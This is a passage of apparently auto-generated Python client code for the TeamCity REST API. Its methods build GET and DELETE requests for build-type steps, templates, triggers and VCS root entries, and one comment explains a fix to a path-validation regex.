if isinstance(params['parameter_name'], TeamCityObject):
path_params['parameterName'] = params['parameter_name'].locator_id
else:
path_params['parameterName'] = params['parameter_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters/{parameterName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_step_parameters_with_http_info(self, bt_locator, step_id, **kwargs):  # noqa: E501
    """get_step_parameters  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_step_parameters_with_http_info(bt_locator, step_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str fields:
    :return: Properties
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'step_id', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_step_parameters" % key
            )
    params.update(params.pop('kwargs'))

    # Every required parameter must be present and non-None.
    for required in ('bt_locator', 'step_id'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`get_step_parameters`" % required)

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    for arg, target in (('bt_locator', 'btLocator'),
                        ('step_id', 'stepId')):
        if arg in params:
            value = params[arg]
            path_params[target] = (
                value.locator_id if isinstance(value, TeamCityObject)
                else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Properties',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_step_setting_with_http_info(self, bt_locator, step_id, field_name, **kwargs):  # noqa: E501
    """get_step_setting  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_step_setting_with_http_info(bt_locator, step_id, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str field_name: (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'step_id', 'field_name']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_step_setting" % key
            )
    params.update(params.pop('kwargs'))

    # Every required parameter must be present and non-None.
    for required in ('bt_locator', 'step_id', 'field_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`get_step_setting`" % required)

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    for arg, target in (('bt_locator', 'btLocator'),
                        ('step_id', 'stepId'),
                        ('field_name', 'fieldName')):
        if arg in params:
            value = params[arg]
            path_params[target] = (
                value.locator_id if isinstance(value, TeamCityObject)
                else value)

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps/{stepId}/{fieldName}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_steps_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_steps  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_steps_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: Steps
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_steps" % key
            )
    params.update(params.pop('kwargs'))

    # The locator is mandatory and may not be None.
    if params.get('bt_locator') is None:
        raise ValueError(
            "Missing the required parameter `bt_locator` when calling "
            "`get_steps`")

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = (
            value.locator_id if isinstance(value, TeamCityObject)
            else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Steps',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_template_with_http_info(self, bt_locator, template_locator, **kwargs):  # noqa: E501
    """get_template  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_template_with_http_info(bt_locator, template_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str template_locator: (required)
    :param str fields:
    :return: BuildType
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'template_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_template" % key
            )
    params.update(params.pop('kwargs'))

    # Every required parameter must be present and non-None.
    for required in ('bt_locator', 'template_locator'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`get_template`" % required)

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    for arg, target in (('bt_locator', 'btLocator'),
                        ('template_locator', 'templateLocator')):
        if arg in params:
            value = params[arg]
            path_params[target] = (
                value.locator_id if isinstance(value, TeamCityObject)
                else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/templates/{templateLocator}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='BuildType',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_templates_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_templates  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_templates_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: BuildTypes
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_templates" % key
            )
    params.update(params.pop('kwargs'))

    # The locator is mandatory and may not be None.
    if params.get('bt_locator') is None:
        raise ValueError(
            "Missing the required parameter `bt_locator` when calling "
            "`get_templates`")

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = (
            value.locator_id if isinstance(value, TeamCityObject)
            else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/templates', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='BuildTypes',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_trigger_with_http_info(self, bt_locator, trigger_locator, **kwargs):  # noqa: E501
    """get_trigger  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_trigger_with_http_info(bt_locator, trigger_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str trigger_locator: (required)
    :param str fields:
    :return: Trigger
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'trigger_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_trigger" % key
            )
    params.update(params.pop('kwargs'))

    # Every required parameter must be present and non-None.
    for required in ('bt_locator', 'trigger_locator'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`get_trigger`" % required)

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    for arg, target in (('bt_locator', 'btLocator'),
                        ('trigger_locator', 'triggerLocator')):
        if arg in params:
            value = params[arg]
            path_params[target] = (
                value.locator_id if isinstance(value, TeamCityObject)
                else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Trigger',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_trigger_setting_with_http_info(self, bt_locator, trigger_locator, field_name, **kwargs):  # noqa: E501
    """get_trigger_setting  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str trigger_locator: (required)
    :param str field_name: (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'trigger_locator', 'field_name']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_trigger_setting" % key
            )
    params.update(params.pop('kwargs'))

    # Every required parameter must be present and non-None.
    for required in ('bt_locator', 'trigger_locator', 'field_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`get_trigger_setting`" % required)

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    for arg, target in (('bt_locator', 'btLocator'),
                        ('trigger_locator', 'triggerLocator'),
                        ('field_name', 'fieldName')):
        if arg in params:
            value = params[arg]
            path_params[target] = (
                value.locator_id if isinstance(value, TeamCityObject)
                else value)

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}/{fieldName}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_triggers_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_triggers  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_triggers_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: Triggers
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_triggers" % key
            )
    params.update(params.pop('kwargs'))

    # The locator is mandatory and may not be None.
    if params.get('bt_locator') is None:
        raise ValueError(
            "Missing the required parameter `bt_locator` when calling "
            "`get_triggers`")

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = (
            value.locator_id if isinstance(value, TeamCityObject)
            else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/triggers', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Triggers',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_vcs_labeling_options_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_vcs_labeling_options  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_vcs_labeling_options_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :return: VcsLabeling
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_vcs_labeling_options" % key
            )
    params.update(params.pop('kwargs'))

    # The locator is mandatory and may not be None.
    if params.get('bt_locator') is None:
        raise ValueError(
            "Missing the required parameter `bt_locator` when calling "
            "`get_vcs_labeling_options`")

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = (
            value.locator_id if isinstance(value, TeamCityObject)
            else value)

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcsLabeling', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='VcsLabeling',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_vcs_root_entries_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_vcs_root_entries  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_vcs_root_entries_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: VcsRootEntries
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_vcs_root_entries" % key
            )
    params.update(params.pop('kwargs'))

    # The locator is mandatory and may not be None.
    if params.get('bt_locator') is None:
        raise ValueError(
            "Missing the required parameter `bt_locator` when calling "
            "`get_vcs_root_entries`")

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = (
            value.locator_id if isinstance(value, TeamCityObject)
            else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-entries', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='VcsRootEntries',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_vcs_root_entry_with_http_info(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """get_vcs_root_entry  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :param str fields:
    :return: VcsRootEntry
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'vcs_root_locator', 'fields']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_vcs_root_entry" % key
            )
    params.update(params.pop('kwargs'))

    # Every required parameter must be present and non-None.
    for required in ('bt_locator', 'vcs_root_locator'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`get_vcs_root_entry`" % required)

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    for arg, target in (('bt_locator', 'btLocator'),
                        ('vcs_root_locator', 'vcsRootLocator')):
        if arg in params:
            value = params[arg]
            path_params[target] = (
                value.locator_id if isinstance(value, TeamCityObject)
                else value)

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='VcsRootEntry',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_vcs_root_entry_checkout_rules_with_http_info(self, bt_locator, vcs_root_locator, **kwargs):  # noqa: E501
    """get_vcs_root_entry_checkout_rules  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str vcs_root_locator: (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['bt_locator', 'vcs_root_locator']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']

    params = locals()
    # Reject keyword arguments the endpoint does not understand, then
    # fold the accepted ones into the params dict.
    for key in params['kwargs']:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_vcs_root_entry_checkout_rules" % key
            )
    params.update(params.pop('kwargs'))

    # Every required parameter must be present and non-None.
    for required in ('bt_locator', 'vcs_root_locator'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`get_vcs_root_entry_checkout_rules`" % required)

    collection_formats = {}

    # TeamCityObject instances collapse to their locator id; plain
    # strings pass through untouched.
    path_params = {}
    for arg, target in (('bt_locator', 'btLocator'),
                        ('vcs_root_locator', 'vcsRootLocator')):
        if arg in params:
            value = params[arg]
            path_params[target] = (
                value.locator_id if isinstance(value, TeamCityObject)
                else value)

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}/checkout-rules', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_zipped_with_http_info(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_zipped  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_zipped_with_http_info(path, bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str path: (required) must be empty or start with '/' (pattern `/(\\/.*)?/`)
    :param str bt_locator: (required)
    :param str base_path:
    :param str locator:
    :param str name:
    :param bool resolve_parameters:
    :return: None
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['path', 'bt_locator', 'base_path', 'locator', 'name', 'resolve_parameters']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Merge recognised keyword arguments; anything unknown is an error.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_zipped" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'path' is set
    if ('path' not in params or
            params['path'] is None):
        raise ValueError("Missing the required parameter `path` when calling `get_zipped`")  # noqa: E501
    # verify the required parameter 'bt_locator' is set
    if ('bt_locator' not in params or
            params['bt_locator'] is None):
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_zipped`")  # noqa: E501
    # BUG FIX: the generated check was `re.search('(\\/.*)?', ...)`, which can
    # never fail because the entire pattern is optional (it always matches the
    # empty string at position 0), so the documented validation was dead code;
    # '\/' is also an invalid escape sequence in a non-raw string literal.
    # Anchoring the pattern in a raw string enforces the documented
    # `/(\/.*)?/` contract: `path` must be empty or start with '/'.
    if 'path' in params and not re.search(r'^(\/.*)?$', params['path']):  # noqa: E501
        raise ValueError("Invalid value for parameter `path` when calling `get_zipped`, must conform to the pattern `/(\\/.*)?/`")  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values contribute their locator id.
    path_params = {}
    if 'path' in params:
        if isinstance(params['path'], TeamCityObject):
            path_params['path'] = params['path'].locator_id
        else:
            path_params['path'] = params['path']  # noqa: E501
    if 'bt_locator' in params:
        if isinstance(params['bt_locator'], TeamCityObject):
            path_params['btLocator'] = params['bt_locator'].locator_id
        else:
            path_params['btLocator'] = params['bt_locator']  # noqa: E501
    # Optional query-string parameters.
    query_params = []
    if 'base_path' in params:
        query_params.append(('basePath', params['base_path']))  # noqa: E501
    if 'locator' in params:
        query_params.append(('locator', params['locator']))  # noqa: E501
    if 'name' in params:
        query_params.append(('name', params['name']))  # noqa: E501
    if 'resolve_parameters' in params:
        query_params.append(('resolveParameters', params['resolve_parameters']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs/files/latest/archived{path}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __remove_all_templates_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """remove_all_templates  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__remove_all_templates_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param bool inline_settings:
    :return: None
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'inline_settings']  # noqa: E501
    all_params += ['async_req', '_return_http_data_only',
                   '_preload_content', '_request_timeout']
    params = locals()
    # Fold recognised keyword arguments into ``params``; reject unknown ones.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method remove_all_templates" % key
            )
        params[key] = val
    del params['kwargs']
    # The build-type locator is mandatory.
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `remove_all_templates`")  # noqa: E501
    collection_formats = {}
    # Path placeholders; TeamCityObject values are reduced to their locator id.
    path_params = {}
    if 'bt_locator' in params:
        value = params['bt_locator']
        path_params['btLocator'] = value.locator_id if isinstance(value, TeamCityObject) else value
    query_params = [('inlineSettings', params['inline_settings'])] if 'inline_settings' in params else []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/templates', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __remove_template_with_http_info(self, bt_locator, template_locator, **kwargs):  # noqa: E501
    """remove_template  # noqa: E501

    Runs synchronously unless ``async_req=True`` is passed, in which case
    the request thread is returned instead of the result.
    >>> thread = api.__remove_template_with_http_info(bt_locator, template_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str template_locator: (required)
    :param bool inline_settings:
    :return: None
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['bt_locator', 'template_locator', 'inline_settings']  # noqa: E501
